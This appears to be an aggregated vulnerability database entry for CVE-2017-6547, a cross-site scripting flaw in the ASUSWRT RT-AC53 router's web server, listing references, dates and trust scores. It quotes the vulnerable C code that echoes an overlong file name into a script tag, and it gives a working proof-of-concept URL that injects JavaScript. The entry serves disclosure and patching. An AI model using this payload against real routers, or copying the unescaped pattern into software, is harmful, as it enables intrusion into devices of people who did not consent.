ID
VAR-E-201703-0071
CVE
| cve_id: | CVE-2017-6547 | Trust: 1.8 |
| cve_id: | CVE-2017-6549 | Trust: 0.8 |
| cve_id: | CVE-2017-6548 | Trust: 0.3 |
EDB ID
41571
TITLE
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting. CVE-2017-6547 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | asuswrt | model: | rt-ac53 | scope: | eq | version: | (3.0.0.4.380.6038) | Trust: 1.6 |
| vendor: | asus | model: | wrt cross site scripting nmap nse script | scope: | - | version: | - | Trust: 0.5 |
| vendor: | asus | model: | wrt session hijacking nmap nse script | scope: | - | version: | - | Trust: 0.5 |
| vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 3.0.0.4.380.6038 | Trust: 0.3 |
| vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
Cross-Site Scripting (XSS)
Component: httpd
CVE: CVE-2017-6547
Vulnerability:
httpd checks in the function handle_request if the requested file name is longer than 50 chars. It then responds with a redirection which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.
...
if(strlen(file) > 50 &&!(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
char inviteCode[256];
snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
send_page( 200, "OK", (char*) 0, inviteCode, 0);
...
PoC:
http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Scripting
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | xss | Trust: 0.5 |
CREDITS
Bruno Bierbaumer
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6547 | Trust: 1.8 |
| db: | EXPLOIT-DB | id: | 41571 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-6549 | Trust: 0.8 |
| db: | EDBNET | id: | 91798 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 142066 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 142065 | Trust: 0.5 |
| db: | NVD | id: | CVE-2017-6548 | Trust: 0.3 |
| db: | BID | id: | 96938 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6547 | Trust: 1.5 |
| url: | https://bierbaumer.net/security/asuswrt/ | Trust: 1.3 |
| url: | https://www.exploit-db.com/exploits/41571/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6549 | Trust: 0.5 |
| url: | https://www.asus.com/asuswrt/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96938 |
| db: | PACKETSTORM | id: | 142066 |
| db: | PACKETSTORM | id: | 142065 |
| db: | EXPLOIT-DB | id: | 41571 |
| db: | EDBNET | id: | 91798 |
LAST UPDATE DATE
2022-07-27T09:11:32.526000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96938 | date: | 2017-03-23T00:01:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96938 | date: | 2017-03-09T00:00:00 |
| db: | PACKETSTORM | id: | 142066 | date: | 2017-04-07T17:32:22 |
| db: | PACKETSTORM | id: | 142065 | date: | 2017-04-07T13:33:33 |
| db: | EXPLOIT-DB | id: | 41571 | date: | 2017-03-08T00:00:00 |
| db: | EDBNET | id: | 91798 | date: | 2017-03-10T00:00:00 |